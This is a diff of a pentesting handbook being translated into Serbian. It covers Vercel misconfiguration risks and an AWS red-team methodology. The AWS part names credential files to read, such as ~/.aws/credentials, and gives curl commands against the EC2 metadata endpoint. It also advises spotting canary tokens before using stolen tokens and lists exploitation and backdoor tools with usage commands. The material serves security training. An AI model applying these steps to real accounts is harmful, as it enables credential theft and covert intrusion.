+- **Revizijski log:** Pruža izvoz aktivnosti tima za poslednjih do 90 dana. Revizijski logovi pomažu u praćenju i praćenju radnji koje su izvršili članovi tima.
+- **Pogrešna konfiguracija:**\
+Dodeljivanje pristupa revizijskim logovima neovlašćenim članovima tima.
+- **Rizici:**
+- **Povrede privatnosti:** Izlaganje osetljivih korisničkih aktivnosti i podataka.
+- **Manipulacija logovima:** Zlonamerni akteri mogli bi izmeniti ili obrisati logove kako bi prikrili svoje tragove.
+- **SAML jedinstveno prijavljivanje:** Omogućava prilagođavanje SAML autentifikacije i sinhronizacije direktorijuma za vaš tim, omogućavajući integraciju sa provajderom identiteta (IdP) za centralizovanu autentifikaciju i upravljanje korisnicima.
+- **Pogrešna konfiguracija:** Napadač bi mogao postaviti zadnja vrata u tim postavljanjem SAML parametara kao što su ID entiteta, SSO URL ili otisci sertifikata.
+- **Rizik:** Održavanje postojanosti
+- **Vidljivost IP adresa:** Kontroliše da li se IP adrese, koje se mogu smatrati ličnim informacijama prema određenim zakonima o zaštiti podataka, prikazuju u upitima za praćenje i Log Drains.
+- **Pogrešna konfiguracija:** Ostaviti vidljivost IP adresa omogućenom bez potrebe.
+- **Rizici:**
+- **Povrede privatnosti:** Neusaglašenost sa propisima o zaštiti podataka kao što je GDPR.
+- **Pravne posledice:** Potencijalne kazne i sankcije za nepravilno rukovanje ličnim podacima.
+- **Blokiranje IP adresa:** Omogućava konfiguraciju IP adresa i CIDR opsega koje Vercel treba da blokira zahteve. Blokirani zahtevi ne doprinose vašem fakturisanju.
+- **Pogrešna konfiguracija:** Može biti zloupotrebljeno od strane napadača da omogući zlonamerni saobraćaj ili blokira legitimni saobraćaj.
+- **Rizici:**
+- **Odbijanje usluge legitimnim korisnicima:** Blokiranje pristupa validnim korisnicima ili partnerima.
+- **Operativni prekidi:** Gubitak dostupnosti usluga za određene regione ili klijente.
 
 ---
 
-### Secure Compute
+### Sigurno računanje
 
-**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
+**Vercel Secure Compute** omogućava sigurne, privatne veze između Vercel funkcija i backend okruženja (npr. baza podataka) uspostavljanjem izolovanih mreža sa posvećenim IP adresama. Ovo eliminiše potrebu za javnim izlaganjem backend usluga, poboljšavajući bezbednost, usklađenost i privatnost.
 
-#### **Potential Misconfigurations and Risks**
+#### **Potencijalne pogrešne konfiguracije i rizici**
 
-1. **Incorrect AWS Region Selection**
-   - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
-   - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
-2. **Overlapping CIDR Blocks**
-   - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
-   - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
-3. **Improper VPC Peering Configuration**
-   - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
-   - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
-4. **Excessive Project Assignments**
-   - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
-   - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
-5. **Inadequate IP Address Management**
-   - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
-   - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
-6. **Including Build Containers Unnecessarily**
-   - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
-   - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
-7. **Failure to Securely Handle Bypass Secrets**
-   - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
-   - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
-8. **Ignoring Region Failover Configurations**
-   - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
-   - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
-9. **Exceeding VPC Peering Connection Limits**
-   - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
-   - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
-10. **Insecure Network Settings**
-    - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
-    - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
+1. **Pogrešan izbor AWS regiona**
+- **Pogrešna konfiguracija:** Odabir AWS regiona za Secure Compute mrežu koji se ne poklapa sa regionom backend usluga.
+- **Rizik:** Povećana latencija, potencijalni problemi sa usklađenošću podataka i degradacija performansi.
+2. **Preklapanje CIDR blokova**
+- **Pogrešna konfiguracija:** Odabir CIDR blokova koji se preklapaju sa postojećim VPC-ima ili drugim mrežama.
+- **Rizik:** Mrežni konflikti koji dovode do neuspešnih veza, neovlašćenog pristupa ili curenja podataka između mreža.
+3. **Pogrešna konfiguracija VPC peeringa**
+- **Pogrešna konfiguracija:** Pogrešno postavljanje VPC peeringa (npr. pogrešni VPC ID-ovi, nepotpune izmene tabele ruta).
+- **Rizik:** Neovlašćen pristup backend infrastrukturi, neuspešne sigurne veze i potencijalna curenja podataka.
+4. **Prekomerna dodela projekata**
+- **Pogrešna konfiguracija:** Dodeljivanje više projekata jednoj Secure Compute mreži bez odgovarajuće izolacije.
+- **Rizik:** Izloženost zajedničkog IP-a povećava površinu napada, potencijalno omogućavajući kompromitovanim projektima da utiču na druge.
+5. **Neadekvatno upravljanje IP adresama**
+- **Pogrešna konfiguracija:** Neupravljanje ili nerotiranje posvećenih IP adresa na odgovarajući način.
+- **Rizik:** IP spoofing, ranjivosti praćenja i potencijalno stavljanje na crnu listu ako su IP adrese povezane sa zlonamernim aktivnostima.
+6. **Nepravilno uključivanje kontejnera za izgradnju**
+- **Pogrešna konfiguracija:** Dodavanje kontejnera za izgradnju u Secure Compute mrežu kada pristup backend-u nije potreban tokom izgradnje.
+- **Rizik:** Povećana površina napada, produženi vremenski okviri za snabdevanje i nepotrebna potrošnja mrežnih resursa.
+7. **Neuspeh u sigurnom rukovanju tajnama zaobilaženja**
+- **Pogrešna konfiguracija:** Izlaganje ili nepravilno rukovanje tajnama korišćenim za zaobilaženje zaštite implementacije.
+- **Rizik:** Neovlašćen pristup zaštićenim implementacijama, omogućavajući napadačima da manipulišu ili implementiraju zlonamerni kod.
+8. **Ignorisanje konfiguracija za prebacivanje regiona**
+- **Pogrešna konfiguracija:** Neuspostavljanje pasivnih regiona za prebacivanje ili pogrešno konfigurisanje postavki prebacivanja.
+- **Rizik:** Downtime usluge tokom prekida u primarnom regionu, što dovodi do smanjene dostupnosti i potencijalne neusklađenosti podataka.
+9. **Prekoračenje limita veza VPC peeringa**
+- **Pogrešna konfiguracija:** Pokušaj uspostavljanja više VPC peering veza nego što je dozvoljeno (npr. prekoračenje 50 veza).
+- **Rizik:** Nemogućnost sigurne povezanosti potrebnih backend usluga, uzrokujući neuspehe implementacije i operativne prekide.
+10. **Neosigurana mrežna podešavanja**
+- **Pogrešna konfiguracija:** Slaba pravila vatrozida, nedostatak enkripcije ili nepravilna segmentacija mreže unutar Secure Compute mreže.
+- **Rizik:** Presretanje podataka, neovlašćen pristup backend uslugama i povećana ranjivost na napade.
 
 ---
 
-### Environment Variables
+### Varijable okruženja
 
-**Purpose:** Manage environment-specific variables and secrets used by all the projects.
+**Svrha:** Upravljanje varijablama i tajnama specifičnim za okruženje koje koriste svi projekti.
 
-#### Security Configurations:
+#### Konfiguracije bezbednosti:
 
-- **Exposing Sensitive Variables**
-  - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
-  - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
-- **Sensitive disabled**
-  - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
-  - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Izlaganje osetljivih varijabli**
+- **Pogrešna konfiguracija:** Prefiksiranje osetljivih varijabli sa `NEXT_PUBLIC_`, čineći ih dostupnim na klijentskoj strani.
+- **Rizik:** Izlaganje API ključeva, kredencijala baze podataka ili drugih osetljivih podataka javnosti, što dovodi do curenja podataka.
+- **Osetljivo onemogućeno**
+- **Pogrešna konfiguracija:** Ako je onemogućeno (podrazumevano) moguće je pročitati vrednosti generisanih tajni.
+- **Rizik:** Povećana verovatnoća slučajnog izlaganja ili neovlašćenog pristupa osetljivim informacijama.
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md
index ad71de826..16518b4d9 100644
--- a/src/pentesting-cloud/aws-security/README.md
+++ b/src/pentesting-cloud/aws-security/README.md
@@ -2,17 +2,17 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+**Pre nego što započnete pentesting** **AWS** okruženja, postoji nekoliko **osnovnih stvari koje treba da znate** o tome kako AWS funkcioniše kako biste razumeli šta treba da radite, kako da pronađete pogrešne konfiguracije i kako da ih iskoristite.
 
-Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
+Koncepti kao što su hijerarhija organizacije, IAM i drugi osnovni koncepti su objašnjeni u:
 
 {{#ref}}
 aws-basic-information/
 {{#endref}}
 
-## Labs to learn
+## Laboratorije za učenje
 
 - [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat)
 - [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable)
@@ -22,49 +22,49 @@ aws-basic-information/
 - [http://flaws.cloud/](http://flaws.cloud/)
 - [http://flaws2.cloud/](http://flaws2.cloud/)
 
-Tools to simulate attacks:
+Alati za simulaciju napada:
 
 - [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/)
 - [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main)
 
-## AWS Pentester/Red Team Methodology
+## AWS Pentester/Red Team metodologija
 
-In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
+Da biste auditovali AWS okruženje, veoma je važno znati: koje **usluge se koriste**, šta je **izloženo**, ko ima **pristup** čemu, i kako su interne AWS usluge povezane sa **spoljnim uslugama**.
 
-From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
+Sa stanovišta Red Teama, **prvi korak za kompromitovanje AWS okruženja** je da uspete da dobijete neke **akreditive**. Ovde su neke ideje kako to učiniti:
 
-- **Leaks** in github (or similar) - OSINT
-- **Social** Engineering
-- **Password** reuse (password leaks)
-- Vulnerabilities in AWS-Hosted Applications
-  - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
-  - **Local File Read**
-    - `/home/USERNAME/.aws/credentials`
-    - `C:\Users\USERNAME\.aws\credentials`
-- 3rd parties **breached**
-- **Internal** Employee
-- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials
+- **Leakovi** na github-u (ili sličnim mestima) - OSINT
+- **Društveno** inženjerstvo
+- **Ponovna upotreba** lozinki (leakovi lozinki)
+- Ranljivosti u AWS-hostovanim aplikacijama
+- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) sa pristupom metadata endpoint-u
+- **Čitanje lokalnih fajlova**
+- `/home/USERNAME/.aws/credentials`
+- `C:\Users\USERNAME\.aws\credentials`
+- 3rd party **provale**
+- **Interni** zaposleni
+- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)akreditivi
 
-Or by **compromising an unauthenticated service** exposed:
+Ili kompromitovanjem **neautentifikovane usluge** koja je izložena:
 
 {{#ref}}
 aws-unauthenticated-enum-access/
 {{#endref}}
 
-Or if you are doing a **review** you could just **ask for credentials** with these roles:
+Ili ako radite **reviziju**, mogli biste jednostavno **tražiti akreditive** sa ovim rolama:
 
 {{#ref}}
 aws-permissions-for-a-pentest.md
 {{#endref}}
 
 > [!NOTE]
-> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+> Nakon što ste uspeli da dobijete akreditive, treba da znate **kome ti akrediti pripadaju**, i **čemu imaju pristup**, tako da treba da izvršite neku osnovnu enumeraciju:
 
-## Basic Enumeration
+## Osnovna enumeracija
 
 ### SSRF
 
-If you found a SSRF in a machine inside AWS check this page for tricks:
+Ako ste pronašli SSRF na mašini unutar AWS-a, proverite ovu stranicu za trikove:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
@@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
 
 ### Whoami
 
-One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
-
+Jedna od prvih stvari koje treba da znate je ko ste (u kojem računu se nalazite i druge informacije o AWS okruženju):
 ```bash
 # Easiest way, but might be monitored?
 aws sts get-caller-identity
@@ -89,10 +88,9 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
 TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
 curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
 ```
-
 > [!CAUTION]
-> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
-> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
+> Imajte na umu da kompanije mogu koristiti **canary tokens** da identifikuju kada se **tokeni kradu i koriste**. Preporučuje se da proverite da li je token canary token ili ne pre nego što ga upotrebite.\
+> Za više informacija [**proverite ovu stranicu**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
 
 ### Org Enumeration
 
@@ -102,30 +100,30 @@ aws-services/aws-organizations-enum.md
 
 ### IAM Enumeration
 
-If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
+Ako imate dovoljno dozvola, **proveravanje privilegija svake entiteta unutar AWS naloga** pomoći će vam da razumete šta vi i druge identitete možete da radite i kako da **povećate privilegije**.
 
-If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
-Check **how to do the numeration and brute-forcing** in:
+Ako nemate dovoljno dozvola da enumerišete IAM, možete **ukrasti brute-force** da ih otkrijete.\
+Proverite **kako da uradite numeraciju i brute-forcing** u:
 
 {{#ref}}
 aws-services/aws-iam-enum.md
 {{#endref}}
 
 > [!NOTE]
-> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-> In the following section you can check some ways to **enumerate some common services.**
+> Sada kada **imate neke informacije o vašim kredencijalima** (i ako ste red tim, nadamo se da **niste otkriveni**). Vreme je da otkrijete koje se usluge koriste u okruženju.\
+> U sledećem odeljku možete proveriti neke načine da **enumerišete neke uobičajene usluge.**
 
 ## Services Enumeration, Post-Exploitation & Persistence
 
-AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
+AWS ima neverovatnu količinu usluga, na sledećoj stranici naći ćete **osnovne informacije, enumeraciju** cheatsheets\*\*,\*\* kako da **izbegnete otkrivanje**, dobijete **persistence**, i druge **post-exploitation** trikove o nekima od njih:
 
 {{#ref}}
 aws-services/
 {{#endref}}
 
-Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools).
+Imajte na umu da **ne** morate obavljati sav posao **ručno**, ispod u ovom postu možete pronaći **odeljak o** [**automatskim alatima**](./#automated-tools).
 
-Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
+Štaviše, u ovoj fazi možda ste otkrili **više usluga izloženih neautentifikovanim korisnicima**, možda ćete moći da ih iskoristite:
 
 {{#ref}}
 aws-unauthenticated-enum-access/
@@ -133,7 +131,7 @@ aws-unauthenticated-enum-access/
 
 ## Privilege Escalation
 
-If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
+Ako možete **proveriti barem svoje dozvole** nad različitim resursima, mogli biste **proveriti da li možete dobiti dodatne dozvole**. Trebalo bi da se fokusirate barem na dozvole navedene u:
 
 {{#ref}}
 aws-privilege-escalation/
@@ -141,10 +139,10 @@ aws-privilege-escalation/
 
 ## Publicly Exposed Services
 
-While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
-As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+Dok enumerišete AWS usluge, možda ste pronašli neke od njih **koje izlažu elemente internetu** (VM/Containers portovi, baze podataka ili usluge čekanja, snimci ili kante...).\
+Kao pentester/red tim, uvek biste trebali proveriti da li možete pronaći **osetljive informacije / ranjivosti** na njima, jer bi vam mogle pružiti **dalji pristup AWS nalogu**.
 
-In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
+U ovoj knjizi trebali biste pronaći **informacije** o tome kako pronaći **izložene AWS usluge i kako ih proveriti**. O tome kako pronaći **ranjivosti u izloženim mrežnim uslugama**, preporučujem vam da **pretražujete** specifičnu **uslugu** na:
 
 {{#ref}}
 https://book.hacktricks.xyz/
@@ -154,52 +152,49 @@ https://book.hacktricks.xyz/
 
 ### From the root/management account
 
-When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
+Kada menadžerski nalog kreira nove naloge u organizaciji, **nova uloga** se kreira u novom nalogu, po defaultu nazvana **`OrganizationAccountAccessRole`** i daje **AdministratorAccess** politiku menadžerskom nalogu da pristupi novom nalogu.
 
 

 
-So, in order to access as administrator a child account you need:
+Dakle, da biste pristupili kao administrator detetovom nalogu, potrebno je:
 
-- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
-  - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
-  - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
-- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
+- **Kompromitovati** **menadžerski** nalog i pronaći **ID** **dečijih naloga** i **imena** **uloge** (OrganizationAccountAccessRole po defaultu) koja omogućava menadžerskom nalogu da pristupi kao admin.
+- Da biste pronašli dečije naloge, idite na odeljak organizacija u aws konzoli ili pokrenite `aws organizations list-accounts`
+- Ne možete direktno pronaći imena uloga, pa proverite sve prilagođene IAM politike i pretražujte bilo koju koja omogućava **`sts:AssumeRole` nad prethodno otkrivenim dečijim nalozima**.
+- **Kompromitujte** **principal** u menadžerskom nalogu sa **`sts:AssumeRole` dozvolom nad ulogom u dečijim nalozima** (čak i ako nalog omogućava bilo kome iz menadžerskog naloga da se pretvara, kao što je eksterni nalog, specifične `sts:AssumeRole` dozvole su neophodne).
 
 ## Automated Tools
 
 ### Recon
 
-- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
-
+- [**aws-recon**](https://github.com/darkbitio/aws-recon): Alat za **prikupljanje inventara** fokusiran na AWS sigurnost, pisan u Ruby-ju.
 ```bash
 # Install
 gem install aws_recon
 
 # Recon and get json
 AWS_PROFILE= aws_recon \
-  --services S3,EC2 \
-  --regions global,us-east-1,us-east-2 \
-  --verbose
+--services S3,EC2 \
+--regions global,us-east-1,us-east-2 \
+--verbose
 ```
-
-- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
-- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
-
+- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist je **alat za više oblaka za dobijanje resursa** (domaćinska imena, IP adrese) od provajdera oblaka.
+- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper vam pomaže da analizirate svoja okruženja Amazon Web Services (AWS). Sada sadrži mnogo više funkcionalnosti, uključujući reviziju za bezbednosne probleme.
 ```bash
 # Installation steps in github
 # Create a config.json file with the aws info, like:
 {
-    "accounts": [
-        {
-            "default": true,
-            "id": "",
-            "name": "dev"
-        }
-    ],
-    "cidrs":
-    {
-        "2.2.2.2/28": {"name": "NY Office"}
-    }
+"accounts": [
+{
+"default": true,
+"id": "",
+"name": "dev"
+}
+],
+"cidrs":
+{
+"2.2.2.2/28": {"name": "NY Office"}
+}
 }
 
 # Enumerate
@@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev
 python cloudmapper.py prepare #Prepare webserver
 python cloudmapper.py webserver #Show webserver
 ```
-
-- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
-
+- [**cartography**](https://github.com/lyft/cartography): Cartography je Python alat koji konsoliduje infrastrukturne resurse i odnose između njih u intuitivnom grafičkom prikazu koji pokreće Neo4j baza podataka.
 ```bash
 # Install
 pip install cartography
@@ -240,17 +233,15 @@ pip install cartography
 # Get AWS info
 AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt  --neo4j-user neo4j
 ```
-
-- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
-- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
-- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
+- [**starbase**](https://github.com/JupiterOne/starbase): Starbase prikuplja resurse i odnose iz usluga i sistema uključujući cloud infrastrukturu, SaaS aplikacije, bezbednosne kontrole i još mnogo toga u intuitivnom grafičkom prikazu podržanom od strane Neo4j baze podataka.
+- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Koristi python2) Ovo je alat koji pokušava da **otkrije sve** [**AWS resurse**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) kreirane u nalogu.
+- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): To je alat za **preuzimanje svih javnih IP adresa** (i IPv4/IPv6) povezanih sa AWS nalogom.
 
 ### Privesc & Exploiting
 
-- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
-- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
-  - Note that pacu **only checks your own privescs paths** (not account wide).
-
+- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Otkrijte najprivilegovanije korisnike u skeniranoj AWS sredini, uključujući AWS Shadow Admins. Koristi powershell. Možete pronaći **definiciju privilegovanih politika** u funkciji **`Check-PrivilegedPolicy`** u [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
+- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu je open-source **AWS exploitation framework**, dizajniran za ofanzivno testiranje bezbednosti protiv cloud okruženja. Može **enumerisati**, pronaći **pogrešne konfiguracije** i **iskoristiti** ih. Možete pronaći **definiciju privilegovanih dozvola** u [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) unutar **`user_escalation_methods`** rečnika.
+- Imajte na umu da pacu **samo proverava vaše vlastite privesc puteve** (ne na nivou celog naloga).
 ```bash
 # Install
 ## Feel free to use venvs
@@ -264,9 +255,7 @@ pacu
 > exec iam__enum_permissions # Get permissions
 > exec iam__privesc_scan # List privileged permissions
 ```
-
-- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
-
+- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) je skripta i biblioteka za identifikaciju rizika u konfiguraciji AWS Identity and Access Management (IAM) za AWS nalog ili AWS organizaciju. Modeluje različite IAM korisnike i uloge u nalogu kao usmereni graf, što omogućava provere za **privilege escalation** i za alternativne puteve koje napadač može da preuzme kako bi dobio pristup resursu ili akciji u AWS-u. Možete proveriti **permissions used to find privesc** puteve u datotekama koje se završavaju sa `_edges.py` u [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
 ```bash
 # Install
 pip install principalmapper
@@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins
 pmapper --profile dev orgs create
 pmapper --profile dev orgs display
 ```
-
-- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
-  It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
-
+- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining je alat za procenu bezbednosti AWS IAM koji identifikuje kršenja principa minimalnih privilegija i generiše izveštaj u HTML formatu sa prioritetom rizika.\
+Prikazaće vam potencijalno **previše privilegovanog** korisnika, inline i aws **politike** i koji **principali imaju pristup njima**. (Ne proverava samo privesc već i druge vrste zanimljivih dozvola, preporučuje se korišćenje).
 ```bash
 # Install
 pip install cloudsplaining
@@ -303,24 +290,20 @@ cloudsplaining download --profile dev
 # Analyze the IAM policies
 cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
 ```
-
-- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
-- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
-- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
+- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack procenjuje AWS naloge na **ranjivosti u otimanju poddomena** kao rezultat odvojenih konfiguracija Route53 i CloudFront.
+- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): Lista ECR repozitorijuma -> Preuzmi ECR repozitorijum -> Uvedi backdoor -> Pomerite backdoor-ovanu sliku
+- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag je alat koji **pretražuje** javne Elastic Block Storage (**EBS**) snimke za tajne koje su možda slučajno ostavljene.
 
 ### Audit
 
-- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
-
